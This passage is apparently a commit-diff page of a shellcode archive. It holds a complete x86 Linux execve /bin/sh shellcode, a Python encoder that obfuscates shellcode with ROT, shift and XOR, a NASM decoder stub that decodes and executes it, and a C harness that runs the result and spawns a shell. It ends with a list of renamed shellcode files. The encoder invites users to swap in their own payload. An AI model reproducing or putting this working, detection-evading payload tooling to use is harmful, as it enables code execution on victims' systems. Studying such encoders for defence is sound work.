mov al,0xb ; __NR_execve 11
int 0x80 ; ping kernel!
############################# Original Shellcode ####################################
ihack4falafel@ubuntu:~$ nasm -f elf32 -o sh.o sh.nasm
ihack4falafel@ubuntu:~$ ld -z execstack -o sh sh.o
ihack4falafel@ubuntu:~$ objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"
################################# Encoder.py #####################################
#!/usr/bin/python
import sys
# Colors
#---------------#---------#
W = '\033[0m' # White #
P = '\033[35m' # Purple #
Y = '\033[33m' # Yellow #
#---------------#---------#
# Check ROT, SHL, and XOR input, otherwise print usage, example, and important notes!
if len(sys.argv) < 4:
print Y+ "Usage :" + P+ " python Encoder.py <ROT number> <number of bits to shift> <XOR number> " +W
print Y+ "Example :" + P+ " python Encoder.py 13 1 1337 " +W
print Y+ "Notes :" + P+ " 1) Make sure to update Decoder.nasm with input values. " +W
print " " + P+ " 2) Due to encoded_shellcode size (word) in Decoder.nasm, shift operatio" +W
print " " + P+ " n is limited to <1-8> bits. Feel free to upgrade size to DW to allow" +W
print " " + P+ " up to 16-bits shift operation. " +W
print " " + P+ " 3) Encoder.py currently include /bin/sh shellcode as proof of concept. " +W
print " " + P+ " Make sure to change it to your desired shellcode. " +W
sys.exit(0)
ROT = int(sys.argv[1])
nbits = int(sys.argv[2])
XOR = int(sys.argv[3])
# initial values
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80") # paste your shellcode here
XOR_HEX = hex(XOR) # Encoded shellcode terminator
encoded_shellcode = ""
original_shellcode = ""
# Orginal shellcode formatted
for x in bytearray(shellcode):
original_shellcode += '0x'
original_shellcode += '%02x, ' %x
# [ROT-N + SHL-N + XOR-N] encoded shellcode formatted
for y in bytearray(shellcode):
byte = (y + ROT)%256 #|-->ROT-N
byte = byte << nbits #########|-->SHL-N
byte = byte ^ XOR #################|-->XOR-N
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %byte
# print original and encoded shellcode
print Y+ "Original Shellcode: " + P+ original_shellcode +W
print Y+ "Encoded Shellcode : " + P+ encoded_shellcode + Y+ XOR_HEX +W
#################################### Encoded Shellcode ##########################################
ihack4falafel@ubuntu:~$ python Encoder.py 13 1 1337
Original Shellcode: 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x87, 0xdc, 0xb0, 0x0b, 0xcd, 0x80,
Encoded Shellcode : 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
ihack4falafel@ubuntu:~$
#################################### Decoder.nasm ###############################################
global _start
section .text
_start:
;
; [ROT-N + SHL-N + XOR-N] encoded execve() code block
;
jmp short call_decoder ; jump to call_decoder to save encoded_shellcode pointer to ESI
decoder:
pop esi ; store encoded_shellcode pointer in ESI
push esi ; push encoded_shellcode pointer to stack for later execution
mov edi, esi ; move encoded_shellcode pointer to EDI
decode:
;
; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input.
; 2) Hence we're limited by the size of encoded_shellcode (word),
; SHR is limited to <1-8> bits. Feel free to upgrade size to DW
; to allow up to 16-bits shift if need be.
;
mov ax, [esi] ; move current word from encoded_shellcode to AX
xor ax, 0x539 ; XOR encoded_shellcode with 1337, one word at a time
jz decoded_shellcode ; if zero jump to decoded_shellcode
shr ax, 1 ; shift encoded_shellcode to right by one bit, one word at a time
sub ax, 13 ; substract 13 from encoded_shellcode, one word at a time
mov [edi], al ; move decoded byte to EDI
inc esi ; point to the next encoded_shellcode word
inc esi
inc edi ; point to the next decoded_shellcode byte
jmp short decode ; jump to decode and repeat the decoding process for the next word!
decoded_shellcode:
call [esp] ; execute decoded_shellcode
call_decoder:
call decoder
encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
######################################### Final Shellcode ###########################################
ihack4falafel@ubuntu:~# nasm -f elf32 -o Decoder.o Decoder.nasm
ihack4falafel@ubuntu:~# ld -z execstack -o Decoder Decoder.o
ihack4falafel@ubuntu:~# objdump -d ./Decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05"
ihack4falafel@ubuntu:~# gcc -fno-stack-protector -z execstack sh.c -o sh
ihack4falafel@ubuntu:~$ ./sh
Shellcode Length: 77
$ whoami
ihack4falafel
$
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05";
void main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

0
shellcodes/netbsd_x86/13474.txt → shellcodes/netbsd_x86/13474.c
View file

0
shellcodes/solaris_sparc/13494.txt → shellcodes/solaris_sparc/13494.c
View file

0
shellcodes/solaris_sparc/13497.txt → shellcodes/solaris_sparc/13497.c
View file

0
shellcodes/solaris_x86/13501.txt → shellcodes/solaris_x86/13501.c
View file

0
shellcodes/solaris_x86/13502.txt → shellcodes/solaris_x86/13502.c
View file

0
shellcodes/unixware/13503.txt → shellcodes/unixware/13503.c
View file

0
shellcodes/windows/13649.txt → shellcodes/windows/13649.as
View file

0
shellcodes/windows/33836.txt → shellcodes/windows/33836.c
View file

0
shellcodes/windows_x86-64/13719.txt → shellcodes/windows_x86-64/13719.c
View file

0
shellcodes/windows_x86-64/13729.txt → shellcodes/windows_x86-64/13729.c
View file

0
shellcodes/windows_x86-64/41827.txt → shellcodes/windows_x86-64/41827.asm
View file

0
shellcodes/windows_x86/13635.txt → shellcodes/windows_x86/13635.as
View file

0
shellcodes/windows_x86/13642.txt → shellcodes/windows_x86/13642.asm
View file

0
shellcodes/windows_x86/16283.txt → shellcodes/windows_x86/16283.asm
View file

0
shellcodes/windows_x86/17545.txt → shellcodes/windows_x86/17545.c
View file